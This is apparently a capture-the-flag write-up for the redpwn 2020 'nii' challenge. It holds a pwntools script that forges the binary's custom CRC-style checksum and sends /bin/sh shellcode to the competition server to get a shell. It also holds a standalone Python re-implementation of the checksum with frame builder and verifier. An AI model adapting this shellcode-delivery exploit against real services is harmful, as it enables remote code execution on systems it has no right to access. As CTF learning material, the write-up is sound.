Tags: crc firmware reversing 

The challenge binary read data from stdin and executed it if the input was well formed; the input carried a custom CRC-style checksum that we had to re-implement (by emulating the binary's checksum loop) to get code execution.
```py
from pwn import *
import binascii

context.arch = "x86_64"
#context.log_level = 'debug'
shellcode = asm(shellcraft.sh())

# Emulate the binary's checksum loop over the payload, one bit at a time
# (MSB first). Each comment names the instruction being emulated.
edi = 0
for char in shellcode:
    itera = 7                                   # mov cl, 7
    while itera >= 0:                           # cmp cl, 0
        r9 = 0                                  # xor r9, r9
        edi2 = edi << 1                         # shl edi, 1
        if edi & 0x80000000:                    # CF set by the shift ...
            r9 = 0x80000011                     # ... cmovb r9, rax (rax = 0x80000011)
        r10b_shr = char >> itera                # shr r10b, cl
        r10b_and = r10b_shr & 1                 # and r10b, 1
        edi_xor = (r10b_and ^ edi2) & 0xFF      # xor dil, r10b
        edi2 = (edi2 & 0xFFFFFF00) | edi_xor    # xor dil, r10b
        edi = (edi2 ^ r9) & 0xFFFFFFFF          # xor rdi, r9; keep the state 32-bit like edi
        itera = itera - 1                       # dec cl

#p = process("./nii")
p = remote("2020.redpwnc.tf", 31215)
# Frame: magic header, little-endian 32-bit checksum, payload; sent as upper-case hex
p.sendline(binascii.hexlify(b"NIIv0.1:MaroCart" + p32(edi) + bytes(shellcode)).upper())
p.interactive()
```
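As an added, dependency-free re-implementation (not from the original writeup) of the checksum the script above emulates, wrapped in the frame layout the script sends (magic, little-endian 32-bit checksum, payload, upper-case hex) together with the verifier a receiver of such frames needs; the function names are my own:

```python
import binascii
import struct

MAGIC = b"NIIv0.1:MaroCart"   # header taken from the script above
POLY = 0x80000011             # value the binary loads into rax before cmovb


def nii_checksum(data: bytes) -> int:
    """Bit-serial, MSB-first checksum recovered from the binary's loop.

    For every bit: shift the 32-bit state left, fold the data bit into
    bit 0, and xor in POLY when the bit shifted out (the carry) was set.
    """
    state = 0
    for byte in data:
        for i in range(7, -1, -1):
            feedback = POLY if state & 0x80000000 else 0
            state = ((state << 1) & 0xFFFFFFFF) ^ ((byte >> i) & 1) ^ feedback
    return state


def build_frame(payload: bytes) -> bytes:
    """MAGIC || LE32 checksum(payload) || payload, upper-case hex encoded."""
    raw = MAGIC + struct.pack("<I", nii_checksum(payload)) + payload
    return binascii.hexlify(raw).upper()


def parse_frame(frame_hex: bytes):
    """Decode a frame and return its payload, or None if any check fails."""
    try:
        raw = binascii.unhexlify(frame_hex)
    except (binascii.Error, ValueError):
        return None                       # not valid hex / odd length
    if len(raw) < len(MAGIC) + 4 or not raw.startswith(MAGIC):
        return None                       # wrong or truncated header
    (expected,) = struct.unpack_from("<I", raw, len(MAGIC))
    payload = raw[len(MAGIC) + 4:]
    if nii_checksum(payload) != expected:
        return None                       # checksum mismatch
    return payload


if __name__ == "__main__":
    frame = build_frame(b"constructed payload")   # constructed sample input
    print(frame)
    print(parse_frame(frame))
```

Because the update rule is linear over GF(2), flipping any payload bit changes the checksum, which is why a single-byte edit to a captured frame is rejected by `parse_frame`.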
The full writeup, with an explanation of the whole reversing process, is here:
[https://www.reversing.tech/2020/07/25/nii-redpwn-2020-OEP.html](https://www.reversing.tech/2020/07/25/nii-redpwn-2020-OEP.html)